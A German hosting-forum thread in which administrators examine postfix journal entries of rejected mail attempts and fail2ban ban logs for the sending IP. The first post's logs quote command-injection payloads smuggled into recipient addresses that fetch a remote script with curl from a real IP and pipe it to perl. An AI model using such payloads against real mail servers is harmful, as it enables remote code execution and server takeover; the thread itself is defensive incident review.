Hackversuche über postfix/smtpd

For topics beyond KeyHelp. / Für Themen jenseits von KeyHelp.
Post Reply
tab-kh
Posts: 724
Joined: Thu 22. Apr 2021, 23:06

Hackversuche über postfix/smtpd

Post by tab-kh »

Ich habe gerade einige Hackversuche der letzten Tage im Journal meiner Server gefunden und bin mir jetzt nicht 100% sicher, ob die nicht vielleicht doch funktioniert haben könnten. Sieht zwar für mich so aus, als ob es nicht funktioniert hätte. Aber ist der Download per curl-Befehl da sicher nicht ausgeführt und somit auch keine heruntergeladene Datei von perl ausgeführt worden?

Das sieht dann im Journal z.B. so aus:

Code: Select all

Aug 31 10:33:00 mail.tabserver.de postfix/smtpd[187406]: connect from ip49.ip-51-75-155.eu[51.75.155.49]
Aug 31 10:33:01 mail.tabserver.de postfix/smtpd[187406]: NOQUEUE: reject: RCPT from ip49.ip-51-75-155.eu[51.75.155.49]: 554 5.7.1 <user8303@example.com>: Relay access denied; from=<test96520@test.com> to=<user8303@example.com> proto=ESMTP helo=<smtp.gmail.com>
Aug 31 10:33:01 mail.tabserver.de postfix/smtpd[187406]: NOQUEUE: reject: RCPT from ip49.ip-51-75-155.eu[51.75.155.49]: 554 5.7.1 <x: $(eval curl -sS http://147.182.224.216/zed|perl)@cve.invalid>: Relay access denied; from=<test96520@test.com> to=<"x: $(eval curl -sS http://147.182.224.216/zed|perl)"@cve.invalid> proto=ESMTP helo=<smtp.gmail.com>
Aug 31 10:33:01 mail.tabserver.de postfix/smtpd[187406]: NOQUEUE: reject: RCPT from ip49.ip-51-75-155.eu[51.75.155.49]: 554 5.7.1 <x: Service status change: localhost $(curl -sS http://147.182.224.216/zed|perl) changed from stopped to running@cve.invalid>: Relay access denied; from=<test96520@test.com> to=<"x: Service status change: localhost $(curl -sS http://147.182.224.216/zed|perl) changed from stopped to running"@cve.invalid> proto=ESMTP helo=<smtp.gmail.com>
Aug 31 10:33:01 mail.tabserver.de postfix/smtpd[187406]: NOQUEUE: reject: RCPT from ip49.ip-51-75-155.eu[51.75.155.49]: 554 5.7.1 <x: $(curl -sS http://147.182.224.216/zed|perl)@cve.invalid>: Relay access denied; from=<test96520@test.com> to=<"x: $(curl -sS http://147.182.224.216/zed|perl)"@cve.invalid> proto=ESMTP helo=<smtp.gmail.com>
Aug 31 10:33:01 mail.tabserver.de postfix/smtpd[187406]: disconnect from ip49.ip-51-75-155.eu[51.75.155.49] ehlo=1 mail=1 rcpt=0/4 quit=1 commands=3/7
Der selbe Mist ist auch von anderen IPs aus versucht worden seit dem 26. August. Ich habe mal geschaut, welche Postfix betreffenden CVEs es so gab in letzter Zeit. Der letzte ist wohl CVE-2026-43964 vom 20. August, würde also zeitlich passen. Betroffen sind aber nur Postfix-Versionen < 3.10.9. Keyhelp zeigt mir Postfix 3.10.13, das sollte schon vor dem 26. August installiert worden sein, war ja schon über zwei Wochen vorher von Debian akzeptiert.
User avatar
Jolinar
Community Moderator
Posts: 4362
Joined: Sat 30. Jan 2016, 07:11
Location: Weimar (Thüringen)
Contact:

Re: Hackversuche über postfix/smtpd

Post by Jolinar »

tab-kh wrote: Tue 1. Sep 2026, 12:06 Sieht zwar für mich so aus, als ob es nicht funktioniert hätte. Aber ist der Download per curl-Befehl da sicher nicht ausgeführt und somit auch keine heruntergeladene Datei von perl ausgeführt worden?
Sieht alles gut aus...

Code: Select all

disconnect from ip49.ip-51-75-155.eu[51.75.155.49] ehlo=1 mail=1 rcpt=0/4 quit=1
rcpt=0/4 bedeutet 0 erfolgreiche von 4 Versuchen
Wenn jemand inkompetent ist, dann kann er nicht wissen, daß er inkompetent ist. (David Dunning)

Data Collector für Community Support
___
Ich verwende zwei verschiedene Schriftfarben in meinen Beiträgen /
I use two different font colors in my posts:
  • In dieser Farbe schreibe ich als Moderator und gebe moderative Hinweise oder begründe moderative Eingriffe /
    In this color, I write as a moderator and provide moderative guidance or justify moderative interventions
  • In dieser Farbe schreibe ich als Community Mitglied und teile meine private Meinung und persönlichen Ansichten mit /
    In this color, I write as a community member and share my personal opinions and views
tab-kh
Posts: 724
Joined: Thu 22. Apr 2021, 23:06

Re: Hackversuche über postfix/smtpd

Post by tab-kh »

Ah, der Text der mich misstrauisch gemacht hat ist der mit dem Status Change von stopped zu running. Aber der scheint ja hier zum "to" zu gehören. Dann gebe ich mal vorsichtig Entwarnung und lege mich wieder hin ;). Ich hatte die Befürchtung, das käme vielleicht von der durch einen eventuellen Bug in Postfix runtergeladenen und ausgeführten Datei. Durch die derzeitig gefühlt täglich von KIs entdeckten Bugs im Linux-Kernel und fast ebenso häufigen Kernel-Updates bin ich momentan wohl besonders paranoid. Heute ist in der Beziehung bisher ein ruhiger Tag, ein Tag ohne neuen Kernel. :lol:.
otto58
Posts: 174
Joined: Thu 29. Jul 2021, 13:20

Re: Hackversuche über postfix/smtpd

Post by otto58 »

Die IP sitzt bei mir (Hetzner VPS) auch im postfix Knast.

Code: Select all

root@key:/var/log# cat /var/log/fail2ban.log.1 | grep 51.75.155.49
2026-08-30 05:31:49,520 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:31:49
2026-08-30 05:31:49,521 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:31:49
2026-08-30 05:34:11,267 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,268 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,268 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,268 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,268 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,269 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,269 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,269 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,269 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:10
2026-08-30 05:34:11,270 fail2ban.filter         [1050]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-30 05:34:11
2026-08-30 05:34:11,424 fail2ban.actions        [1050]: NOTICE  [kh-postfix] Ban 51.75.155.49
2026-08-31 05:34:11,159 fail2ban.actions        [1050]: NOTICE  [kh-postfix] Unban 51.75.155.49
2026-08-31 16:03:57,587 fail2ban.filter         [1067]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-31 16:03:57
2026-08-31 16:03:57,588 fail2ban.filter         [1067]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-31 16:03:57
2026-08-31 16:03:57,589 fail2ban.filter         [1067]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-31 16:03:57
2026-08-31 16:03:57,589 fail2ban.filter         [1067]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-31 16:03:57
2026-08-31 16:03:57,590 fail2ban.filter         [1067]: INFO    [kh-postfix] Found 51.75.155.49 - 2026-08-31 16:03:57
2026-08-31 16:03:57,591 fail2ban.observer       [1067]: INFO    [kh-postfix] Found 51.75.155.49, bad - 2026-08-31 16:03:57, 1 # -> 2.0
2026-08-31 16:03:57,591 fail2ban.observer       [1067]: INFO    [kh-postfix] Found 51.75.155.49, bad - 2026-08-31 16:03:57, 1 # -> 2.0
2026-08-31 16:03:57,591 fail2ban.observer       [1067]: INFO    [kh-postfix] Found 51.75.155.49, bad - 2026-08-31 16:03:57, 1 # -> 2.0
2026-08-31 16:03:57,591 fail2ban.observer       [1067]: INFO    [kh-postfix] Found 51.75.155.49, bad - 2026-08-31 16:03:57, 1 # -> 2.0
2026-08-31 16:03:57,591 fail2ban.observer       [1067]: INFO    [kh-postfix] Found 51.75.155.49, bad - 2026-08-31 16:03:57, 1 # -> 2.0
2026-08-31 16:03:57,637 fail2ban.actions        [1067]: NOTICE  [kh-postfix] Ban 51.75.155.49
2026-08-31 16:03:57,641 fail2ban.observer       [1067]: INFO    [kh-postfix] IP 51.75.155.49 is bad: 1 # last 2026-08-30 05:34:11 - incr 1d to 2d
2026-08-31 16:03:57,642 fail2ban.observer       [1067]: NOTICE  [kh-postfix] Increase Ban 51.75.155.49 (2 # 2d -> 2026-09-02 16:03:57)
Post Reply